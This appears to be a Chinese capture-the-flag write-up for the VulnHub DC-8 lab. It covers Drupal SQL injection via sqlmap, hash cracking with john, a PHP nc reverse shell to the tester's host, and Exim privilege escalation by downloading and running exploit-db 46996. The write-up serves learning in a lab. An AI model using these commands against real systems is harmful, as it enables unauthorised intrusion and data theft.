zoukankan      html  css  js  c++  java
  • DC: 8

    靶机地址:https://www.vulnhub.com/entry/dc-8,367/

    获取靶机IP:192.168.40.187

    nmap -sP 192.168.40.0/24

     查看靶机开放的端口,开放了22和80端口

    nmap -sV -p-  192.168.40.187

     访问80端口,是一个 Drupal 的cms

     随便测试了一下,该网站存在了SQL注入

     sqlmap一条龙

    sqlmap -u http://192.168.40.187/?nid=1 --dbs
    sqlmap -u http://192.168.40.187/?nid=1 -D d7db --tables
    sqlmap -u http://192.168.40.187/?nid=1 -D d7db -T users --columns
    sqlmap -u http://192.168.40.187/?nid=1 -D d7db -T users -C name,pass --dump

    用户密码被加密过,可以用john来爆破

     把密码保存到 passwd.txt 中,然后用 john 爆破出用户密码 turtle

     通过dirb扫描目录,找到网站后台登录页面, ip/user,登录之后发现有个页面可以执行代码,来一发反弹shell(踩坑:单写入代码好像不执行,需要加入字符)

    <?php system("nc -e /bin/bash 192.168.40.166 4444");?>

     随便填一下,点击提交就可以执行反弹shell

     成功拿到反弹shell,下一步是提权

     找一下能不能用SUID提权

    find / -perm -u=s -type f 2>/dev/null

     用 searchsploit 发现这个可以提权,提权方法: https://www.exploit-db.com/exploits/46996

     用 kali 开一个80端口,然后把 46996.sh 上传到 靶机的 /tmp 目录下(踩坑:46996.sh 需要用vim编辑器打开,执行 :set ff? 如果是dos则需要执行 :set ff=unix ,然后再wq保存,来源于这篇WP

    wget http://192.168.40.166/46996.sh
    chmod 777 *
    ./46996.sh -m netcat

     获取flag

  • 相关阅读:
    洛谷P1182 数列分段`Section II`
    洛谷P3902 递增
    洛谷P1678-烦恼的高考志愿
    POJ 3263-Tallest Cow
    洛谷P2280 [HNOI2003]激光炸弹
    POJ 1958
    Vijos 1197
    VirtualBox 导入.vdi文件时报“uuid is exists”错误
    解压常用
    cut 命令
  • 原文地址:https://www.cnblogs.com/gaonuoqi/p/14217635.html
Copyright © 2011-2022 走看看